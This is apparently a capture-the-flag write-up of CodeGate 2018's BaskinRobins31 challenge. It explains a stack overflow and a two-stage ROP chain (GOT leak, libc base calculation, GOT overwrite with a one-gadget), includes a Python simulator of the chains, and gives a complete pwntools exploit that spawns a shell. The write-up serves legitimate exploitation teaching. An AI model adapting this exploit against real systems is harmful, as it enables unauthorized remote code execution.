Introduction
Finally back from the Spring Festival vacation. Since Readme-revenge is not a typical example of a ROP attack, I will use the easiest challenge from CodeGate 2018 to demonstrate how a ROP attack is put together.
Vulnerability Analysis
Neither PIE (ASLR for the binary's own addresses) nor a stack canary is enabled in the binary, so gadget, GOT and .bss addresses are fixed; only libc addresses have to be leaked. Furthermore, there is an obvious stack buffer overflow in the function your_turn: the buffer is 0xb0 bytes, and the read that fills it accepts far more than that, so the saved rbp and the return address can be overwritten.
Exploit Plan
The exploit is divided into two parts: (1) leak the libc version by building a ROP chain that reads a function pointer out of the GOT and prints it, then subtract the symbol's offset in the matching libc to get the libc base; (2) build a second ROP chain that uses read to overwrite a GOT function pointer with the address of the one-gadget (magic gadget), then call through the overwritten entry to get a shell.
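As an added example, and not the original exploit or any code from the challenge, here is a small pure-Python model of that two-stage plan. Everything about the gadgets is an assumption for illustration: the helper at 0x40087a is modelled as pop rdi; pop rsi; pop rdx; ret, 0x4008f4 and 0x400bbb as call sites for read and write, 0x400700 as the PLT stub of the function whose GOT slot is overwritten, and 0xf7250 / 0xf1147 as the libc symbol and one-gadget offsets. The block builds both chains, checks them with a tiny ret-driven simulator, and computes the libc base from a constructed leak with the page-alignment sanity check a practitioner wants before trusting an offset.

```python
import struct

# Assumed addresses and offsets (illustrative stand-ins, see the lead-in).
POP3_RET   = 0x40087a   # assumed: pop rdi; pop rsi; pop rdx; ret (the "helper")
CALL_READ  = 0x4008f4   # assumed: call site that invokes read() and returns
CALL_WRITE = 0x400bbb   # assumed: call site that invokes write() and returns
PLT_CALL   = 0x400700   # assumed: PLT stub of the function behind GOT_ENTRY
GOT_ENTRY  = 0x602028   # GOT slot that is leaked and later overwritten
BUF_SIZE   = 0xb0       # bytes needed to reach the saved rbp in your_turn
LIBC_SYM_OFF   = 0xf7250   # assumed offset of the leaked symbol in the remote libc
ONE_GADGET_OFF = 0xf1147   # assumed one-gadget offset in that same libc

def p64(v):
    return struct.pack("<Q", v)

def u64(b):
    return struct.unpack("<Q", b)[0]

def call3(gadget, target, rdi, rsi, rdx):
    """ROP fragment: pop three argument registers, then return into target."""
    return p64(gadget) + p64(rdi) + p64(rsi) + p64(rdx) + p64(target)

def rop_leak():
    """Stage 1: write(1, GOT_ENTRY, 8) prints a libc pointer to stdout."""
    return call3(POP3_RET, CALL_WRITE, 1, GOT_ENTRY, 8)

def rop_overwrite():
    """Stage 2: read(0, GOT_ENTRY, 8) replaces the pointer, then call through it."""
    return call3(POP3_RET, CALL_READ, 0, GOT_ENTRY, 8) + p64(PLT_CALL)

def overflow_payload(rop):
    """Pad to the saved rbp, supply a dummy rbp, then place the chain as the return address."""
    return b"A" * BUF_SIZE + p64(0) + rop

# Minimal model of what each address does when we return into it.
GADGETS = {
    POP3_RET:   ["pop rdi", "pop rsi", "pop rdx", "ret"],
    CALL_READ:  ["call read", "ret"],
    CALL_WRITE: ["call write", "ret"],
    PLT_CALL:   ["call plt", "ret"],
}

def simulate(chain, gadgets=GADGETS):
    """Walk the chain one 8-byte word at a time like ret/pop would; record the calls made.
    Simplification: every call site is assumed to return and then ret into the next word."""
    words = [u64(chain[i:i + 8]) for i in range(0, len(chain), 8)]
    regs = {"rdi": None, "rsi": None, "rdx": None}
    calls = []
    pc = 0
    while pc < len(words):
        addr = words[pc]
        pc += 1
        if addr not in gadgets:
            raise ValueError("returned into non-gadget address %#x" % addr)
        for op in gadgets[addr]:
            if op.startswith("pop "):
                regs[op[4:]] = words[pc]   # pop consumes the next stack word
                pc += 1
            elif op.startswith("call "):
                calls.append((op[5:], regs["rdi"], regs["rsi"], regs["rdx"]))
            # "ret" just continues with the next word on the stack
    return calls

def libc_base_from_leak(raw8):
    """Turn the 8 leaked bytes into a libc base; a non page-aligned result means
    the offset (or the libc version it came from) is wrong."""
    base = u64(raw8) - LIBC_SYM_OFF
    if base & 0xfff:
        raise ValueError("libc base %#x is not page aligned: wrong offset or libc?" % base)
    return base

def one_gadget(base):
    return base + ONE_GADGET_OFF

if __name__ == "__main__":
    print(simulate(rop_leak()))
    print(simulate(rop_overwrite()))
    # Constructed leak: a symbol living 0xf7250 above a page-aligned base.
    base = libc_base_from_leak(p64(0x7ffff7a0d000 + LIBC_SYM_OFF))
    print("libc base %#x, one-gadget %#x" % (base, one_gadget(base)))
```

The simulator is what makes the chain reviewable before it is sent: if the pops and the call target are in the wrong order, the recorded (function, rdi, rsi, rdx) tuples show it immediately, which is much cheaper than watching the remote process crash.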
Exploit
from pwn import *
import sys
import time

# 0: remote target, 1: local process, 2: local process with gdb attached
DEBUG = int(sys.argv[1]) if len(sys.argv) > 1 else 1
if DEBUG == 0:
    r = remote("ch41l3ng3s.codegate.kr", 3131)
elif DEBUG == 1:
    r = process("./BaskinRobins31")
elif DEBUG == 2:
    r = process("./BaskinRobins31")
    gdb.attach(r, '''source ./script''')


def exploit():
    helper = 0x40087a          # gadget that pops the three argument registers and returns
    junk = 0x424242424242

    # Stage 1: overflow the 0xb0-byte buffer in your_turn. Saved rbp is pointed just
    # below 0x6020c0 in .bss, and the return address goes to the helper so that
    # read(0, 0x6020c0, 0x80) stages the next chain there.
    payload = b"A" * 0xb0
    payload += p64(0x6020b8)                                        # saved rbp
    payload += p64(helper)
    payload += p64(0) + p64(0x6020c0) + p64(0x80) + p64(0x4008f4)   # read(0, 0x6020c0, 0x80)
    payload += p64(junk) * 20
    r.recvuntil(b"(1-3)")
    r.send(payload)
    time.sleep(2)

    # Stage 2, executed from 0x6020c0: leak the GOT entry at 0x602028 (8 bytes) via
    # 0x400bbb, then return into 0x4008f4 again so the next read lands on the GOT entry.
    payload2 = p64(helper)
    payload2 += p64(0) + p64(0x602028) + p64(0x8) + p64(0x400bbb)
    payload2 += p64(0x6020c0) + p64(0x414141414141) * 4
    payload2 += p64(0x4008f4)
    r.send(payload2)

    # The leaked GOT entry is the 8th qword after ":(" plus two bytes of output.
    r.recvuntil(b":(")
    r.recv(2)
    leaks = [u64(r.recv(8)) for _ in range(9)]
    for v in leaks[5:]:
        log.info("0x%x", v)
    leak = leaks[7]

    # Offsets are specific to the remote libc identified from the leaked pointer.
    libcBase = leak - 0xf7250
    log.info("Libc Base: 0x%x", libcBase)
    oneGadget = libcBase + 0xf1147

    # Stage 3: the pending read(0, 0x602028, 8) overwrites the GOT entry with the one-gadget.
    payload3 = p64(oneGadget)
    r.send(payload3)
    r.interactive()


exploit()
Conclusion
It is not a difficult challenge, but it is a typical ROP one. Since Readme-revenge from 34C3 is more like a riddle, I use this challenge as the example of a ROP attack instead.